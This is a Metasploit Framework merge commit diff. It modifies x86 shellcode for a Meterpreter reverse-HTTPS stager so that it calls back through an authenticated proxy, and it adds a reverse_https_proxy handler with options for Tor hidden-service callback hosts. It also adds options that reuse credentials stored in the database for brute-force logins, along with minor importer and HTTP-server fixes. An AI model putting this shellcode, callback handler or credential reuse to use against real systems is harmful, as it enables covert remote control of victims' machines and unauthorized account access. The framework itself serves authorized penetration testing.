Merge branch 'master' of https://github.com/rapid7/metasploit-framework into powershell_import

Author: RageLtMan

external/source/shellcode/windows/x86/src/block/block_reverse_https_proxy.asm

@@ -16,24 +16,24 @@ load_wininet:
   push 0x0726774C        ; hash( "kernel32.dll", "LoadLibraryA" )
   call ebp               ; LoadLibraryA( "wininet" )
 
-call internetopen
+  call internetopen
 
 proxy_server_name:
-	db "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:55555",0x00
+  db "PROXYHOST:PORT",0x00
 
 internetopen:
-  mov ecx, esp
+  pop ecx                ; pointer to proxy_server_name
   xor edi,edi
   push edi               ; DWORD dwFlags
-  push edi               ; LPCTSTR lpszProxyBypass
+  push esp               ; LPCTSTR lpszProxyBypass (empty)
   push ecx               ; LPCTSTR lpszProxyName
   push byte 3            ; DWORD dwAccessType (INTERNET_OPEN_TYPE_PROXY  = 3)
-  push byte 0            ; NULL pointer  
-  push esp               ; LPCTSTR lpszAgent ("\x00")
+  push byte 0            ; NULL pointer
+;  push esp               ; LPCTSTR lpszAgent ("\x00") // doesn't seem to work with this
   push 0xA779563A        ; hash( "wininet.dll", "InternetOpenA" )
   call ebp
 
-  jmp short dbl_get_server_host
+  jmp dbl_get_server_host 
 
 internetconnect:
   pop ebx                ; Save the hostname pointer
@@ -49,6 +49,37 @@ internetconnect:
   push 0xC69F8957        ; hash( "wininet.dll", "InternetConnectA" )
   call ebp
 
+  mov esi,eax		 ; safe hConnection
+
+  db "PROXY_AUTH_START" 	 ; start marker for optional authentification, removed during payload creation
+
+  call set_proxy_username
+proxy_username:
+  db "PROXY_USERNAME",0x00
+set_proxy_username:
+  pop ecx                ; Save the proxy username
+  push dword 15 	 ; DWORD dwBufferLength
+  push ecx  	 	 ; LPVOID lpBuffer (username)
+  push byte 43           ; DWORD dwOption (INTERNET_OPTION_PROXY_USERNAME)
+  push esi		 ; hConnection
+  push 0x869E4675        ; hash( "wininet.dll", "InternetSetOptionA" )
+  call ebp
+
+  call set_proxy_password
+proxy_password:
+  db "PROXY_PASSWORD",0x00
+set_proxy_password:
+  pop ecx                ; Save the proxy password
+  push dword 15		 ; DWORD dwBufferLength
+  push ecx  	 	 ; LPVOID lpBuffer (password)
+  push byte 44           ; DWORD dwOption (INTERNET_OPTION_PROXY_PASSWORD)
+  push esi		 ; hConnection
+  push 0x869E4675        ; hash( "wininet.dll", "InternetSetOptionA" )
+  call ebp
+
+  db "PROXY_AUTH_STOP"   	 ; stop marker for optional authentification, removed during payload creation
+
+
   jmp get_server_uri
 
 httpopenrequest:
@@ -68,7 +99,7 @@ httpopenrequest:
   push edx               ; version
   push ecx               ; url
   push edx               ; method
-  push eax               ; hConnection
+  push esi               ; hConnection
   push 0x3B2E55EB        ; hash( "wininet.dll", "HttpOpenRequestA" )
   call ebp
   mov esi, eax           ; hHttpRequest

lib/msf/base/simple/framework/module_paths.rb

@@ -5,25 +5,25 @@ module ModulePaths
 				# Initialize the module paths
 				#
 				# @return [void]
-				def init_module_paths
+				def init_module_paths(opts={})
 					# Ensure the module cache is accurate
 					self.modules.refresh_cache_from_database
 
 					# Initialize the default module search paths
 					if (Msf::Config.module_directory)
-						self.modules.add_module_path(Msf::Config.module_directory)
+						self.modules.add_module_path(Msf::Config.module_directory, opts)
 					end
 
 					# Initialize the user module search path
 					if (Msf::Config.user_module_directory)
-						self.modules.add_module_path(Msf::Config.user_module_directory)
+						self.modules.add_module_path(Msf::Config.user_module_directory, opts)
 					end
 
 					# If additional module paths have been defined globally, then load them.
 					# They should be separated by semi-colons.
 					if self.datastore['MsfModulePaths']
 						self.datastore['MsfModulePaths'].split(";").each { |path|
-							self.modules.add_module_path(path)
+							self.modules.add_module_path(path, opts)
 						}
 					end
 				end

lib/msf/core/auxiliary/auth_brute.rb

@@ -22,6 +22,9 @@ def initialize(info = {})
 			OptBool.new('VERBOSE', [ true, "Whether to print output for all attempts", true]),
 			OptBool.new('BLANK_PASSWORDS', [ false, "Try blank passwords for all users", true]),
 			OptBool.new('USER_AS_PASS', [ false, "Try the username as the password for all users", true]),
+			OptBool.new('DB_ALL_CREDS', [false,"Try each user/password couple stored in the current database",true]),
+			OptBool.new('DB_ALL_USERS', [false,"Add all users in the current database to the list",false]),
+			OptBool.new('DB_ALL_PASS', [false,"Add all passwords in the current database to the list",false]),
 			OptBool.new('STOP_ON_SUCCESS', [ true, "Stop guessing when a credential works for a host", false]),
 		], Auxiliary::AuthBrute)
 
@@ -184,6 +187,23 @@ def build_credentials_array
 		if datastore['BLANK_PASSWORDS']
 			credentials = gen_blank_passwords(users, credentials)
 		end
+		if framework.db.active
+			if datastore['DB_ALL_CREDS']
+				myworkspace.creds.each do |o|
+					credentials << [o.user, o.pass] if o.ptype =~ /password/
+				end
+			end
+			if datastore['DB_ALL_USERS']
+				myworkspace.creds.each do |o|
+					users << o.user
+				end
+			end
+			if datastore['DB_ALL_PASS']
+				myworkspace.creds.each do |o|
+					passwords << o.pass if o.ptype =~ /password/
+				end
+			end
+		end
 		credentials.concat(combine_users_and_passwords(users, passwords))
 		credentials.uniq!
 		credentials = just_uniq_users(credentials) if @strip_passwords

lib/msf/core/db.rb

@@ -2980,10 +2980,10 @@ def import_filetype_detect(data)
 		elsif (firstline.index("<scanJob>"))
 			@import_filedata[:type] = "Retina XML"
 			return :retina_xml
-		elsif (firstline.index("<get_reports_response status=\"200\" status_text=\"OK\">"))
+		elsif (firstline.index(/<get_reports_response status=['"]200['"] status_text=['"]OK['"]>/))
 			@import_filedata[:type] = "OpenVAS XML"
 			return :openvas_new_xml
-		elsif (firstline.index("<report id=\""))
+		elsif (firstline.index(/<report id=['"]/))
 			@import_filedata[:type] = "OpenVAS XML"
 			return :openvas_new_xml
 		elsif (firstline.index("<NessusClientData>"))

lib/msf/core/exploit/exe.rb

@@ -70,7 +70,7 @@ def generate_payload_exe_service(opts = {})
 		pl = opts[:code]
 		pl ||= payload.encoded
 
-		if opts[:arch] and opts[:arch] == ARCH_X64
+		if opts[:arch] and (opts[:arch] == ARCH_X64 or opts[:arch] == ARCH_X86_64)
 			exe = Msf::Util::EXE.to_win64pe_service(framework, pl, opts)
 		else
 			exe = Msf::Util::EXE.to_win32pe_service(framework, pl, opts)
@@ -89,7 +89,7 @@ def generate_payload_dll(opts = {})
 		pl = opts[:code]
 		pl ||= payload.encoded
 
-		if opts[:arch] and opts[:arch] == ARCH_X64
+		if opts[:arch] and (opts[:arch] == ARCH_X64 or opts[:arch] == ARCH_X86_64)
 			dll = Msf::Util::EXE.to_win64pe_dll(framework, pl, opts)
 		else
 			dll = Msf::Util::EXE.to_win32pe_dll(framework, pl, opts)

lib/msf/core/exploit/http/server.rb

@@ -36,6 +36,9 @@ def initialize(info = {})
 			], Exploit::Remote::HttpServer
 		)
 
+		# Used to keep track of resources added to the service manager by
+		# this module. see #add_resource and #cleanup
+		@my_resources = []
 		@service_path = nil
 	end
 
@@ -202,6 +205,39 @@ def start_service(opts = {})
 		add_resource(uopts)
 	end
 
+	# Set {#on_request_uri} to handle the given +uri+ in addition to the one
+	# specified by the user in URIPATH.
+	#
+	# @note This MUST be called from {#primer} so that the service has been set
+	# up but we have not yet entered the listen/accept loop.
+	#
+	# @param uri [String] The resource URI that should be handled by
+	#   {#on_request_uri}.
+	# @return [void]
+	def hardcoded_uripath(uri)
+		proc = Proc.new do |cli, req|
+			on_request_uri(cli, req)
+		end
+
+		vprint_status("Adding hardcoded uri #{uri}")
+		begin
+			add_resource({'Path' => uri, 'Proc' => proc})
+		rescue RuntimeError => e
+			print_error("This module requires a hardcoded uri at #{uri}. Can't run while other modules are using it.")
+			raise e
+		end
+	end
+
+	# Take care of removing any resources that we created
+	def cleanup
+		# Must dup here because remove_resource modifies @my_resources
+		@my_resources.dup.each do |resource|
+			remove_resource(resource)
+		end
+
+		super
+	end
+
 	#
 	# Return a Hash containing a best guess at the actual browser and operating
 	# system versions, based on the User-Agent header.
@@ -358,9 +394,16 @@ def report_user_agent(address, request, client_opts={})
 	# NOTE: Calling #add_resource will change the results of subsequent calls
 	# to #get_resource!
 	#
+	# @return (see Rex::Service#add_resource)
 	def add_resource(opts)
 		@service_path = opts['Path']
-		service.add_resource(opts['Path'], opts)
+		res = service.add_resource(opts['Path'], opts)
+
+		# This has to go *after* the call to service.add_resource in case
+		# the service manager doesn't like it for some reason and raises.
+		@my_resources.push(opts['Path'])
+
+		res
 	end
 
 	#
@@ -455,7 +498,11 @@ def srvhost_addr
 	# Removes a URI resource.
 	#
 	def remove_resource(name)
-		service.remove_resource(name)
+		# Guard against removing resources added by other modules
+		if @my_resources.include?(name)
+			@my_resources.delete(name)
+			service.remove_resource(name)
+		end
 	end
 
 	#

lib/msf/core/handler/reverse_http.rb

@@ -83,13 +83,21 @@ def ssl?
 	# addresses.
 	#
 	def full_uri
-		lhost = datastore['LHOST']
+		unless datastore['HIDDENHOST'].nil? or datastore['HIDDENHOST'].empty?
+			lhost = datastore['HIDDENHOST']
+		else
+			lhost = datastore['LHOST']
+		end
 		if lhost.empty? or lhost == "0.0.0.0" or lhost == "::"
 			lhost = Rex::Socket.source_address
 		end
 		lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost)
 		scheme = (ssl?) ? "https" : "http"
-		uri = "#{scheme}://#{lhost}:#{datastore["LPORT"]}/"
+		unless datastore['HIDDENPORT'].nil? or datastore['HIDDENPORT'] == 0
+			uri = "#{scheme}://#{lhost}:#{datastore["HIDDENPORT"]}/"
+		else
+			uri = "#{scheme}://#{lhost}:#{datastore["LPORT"]}/"
+		end
 
 		uri
 	end
@@ -297,6 +305,42 @@ def on_request(cli, req, obj)
 					print_status("Patched user-agent at offset #{i}...")
 				end
 
+				# Activate a custom proxy
+				i = blob.index("METERPRETER_PROXY\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00")
+				if i
+					if datastore['PROXYHOST']
+						if datastore['PROXYHOST'].to_s != ""
+							proxyhost = datastore['PROXYHOST'].to_s
+							proxyport = datastore['PROXYPORT'].to_s || "8080"
+							proxyinfo = proxyhost + ":" + proxyport
+							if proxyport == "80"
+								proxyinfo = proxyhost
+							end
+							if datastore['PROXY_TYPE'].to_s == 'HTTP'
+								proxyinfo = 'http://' + proxyinfo
+							else #socks
+								proxyinfo = 'socks=' + proxyinfo
+							end
+							proxyinfo << "\x00"
+							blob[i, proxyinfo.length] = proxyinfo
+							print_status("Activated custom proxy #{proxyinfo}, patch at offset #{i}...")
+							#Optional authentification
+							unless 	(datastore['PROXY_USERNAME'].nil? or datastore['PROXY_USERNAME'].empty?) or
+								(datastore['PROXY_PASSWORD'].nil? or datastore['PROXY_PASSWORD'].empty?) or
+								datastore['PROXY_TYPE'] == 'SOCKS'
+								
+								proxy_username_loc = blob.index("METERPRETER_USERNAME_PROXY\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00")
+								proxy_username = datastore['PROXY_USERNAME'] << "\x00"
+								blob[proxy_username_loc, proxy_username.length] = proxy_username
+
+								proxy_password_loc = blob.index("METERPRETER_PASSWORD_PROXY\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00")
+								proxy_password = datastore['PROXY_PASSWORD'] << "\x00"
+								blob[proxy_password_loc, proxy_password.length] = proxy_password
+							end
+						end
+					end
+				end
+
 				# Replace the transport string first (TRANSPORT_SOCKET_SSL)
 				i = blob.index("METERPRETER_TRANSPORT_SSL")
 				if i

lib/msf/core/handler/reverse_https_proxy.rb

@@ -0,0 +1,58 @@
+# -*- coding: binary -*-
+require 'rex/io/stream_abstraction'
+require 'rex/sync/ref'
+require 'msf/core/handler/reverse_http'
+
+module Msf
+module Handler
+
+###
+#
+# This handler implements the HTTP SSL tunneling interface.
+#
+###
+module ReverseHttpsProxy
+
+	include Msf::Handler::ReverseHttp
+
+	#
+	# Returns the string representation of the handler type
+	#
+	def self.handler_type
+		return "reverse_https_proxy"
+	end
+
+	#
+	# Returns the connection-described general handler type, in this case
+	# 'tunnel'.
+	#
+	def self.general_handler_type
+		"tunnel"
+	end
+
+	#
+	# Initializes the HTTP SSL tunneling handler.
+	#
+	def initialize(info = {})
+		super
+
+		register_options(
+			[
+				OptString.new('LHOST', [ true, "The local listener hostname" ,"127.0.0.1"]),
+				OptPort.new('LPORT', [ true, "The local listener port", 8443 ]),
+				OptString.new('PROXYHOST', [true, "The address of the http proxy to use" ,"127.0.0.1"]),
+				OptInt.new('PROXYPORT', [ false, "The Proxy port to connect to", 8080 ]),
+				OptString.new('HIDDENHOST', [false, "The tor hidden host to connect to, when set it will be used instead of LHOST for stager generation"]),
+				OptInt.new('HIDDENPORT', [ false, "The hidden port to connect to, when set it will be used instead of LPORT for stager generation"]),
+				OptEnum.new('PROXY_TYPE', [true, 'Http or Socks4 proxy type', 'HTTP', ['HTTP', 'SOCKS']]),
+				OptString.new('PROXY_USERNAME', [ false, "An optional username for HTTP proxy authentification"]),
+				OptString.new('PROXY_PASSWORD', [ false, "An optional password for HTTP proxy authentification"])
+ 			], Msf::Handler::ReverseHttpsProxy)
+
+	end
+
+end
+
+end
+end
+

lib/msf/core/module/reference.rb

@@ -96,6 +96,8 @@ def initialize(in_ctx_id = 'Unknown', in_ctx_val = '')
 			self.site = 'http://www.osvdb.org/' + in_ctx_val.to_s
 		elsif (in_ctx_id == 'CVE')
 			self.site = "http://cvedetails.com/cve/#{in_ctx_val.to_s}/"
+		elsif (in_ctx_id == 'CWE')
+			self.site = "http://cwe.mitre.org/data/definitions/#{in_ctx_val.to_s}.html"
 		elsif (in_ctx_id == 'BID')
 			self.site = 'http://www.securityfocus.com/bid/' + in_ctx_val.to_s
 		elsif (in_ctx_id == 'MSB')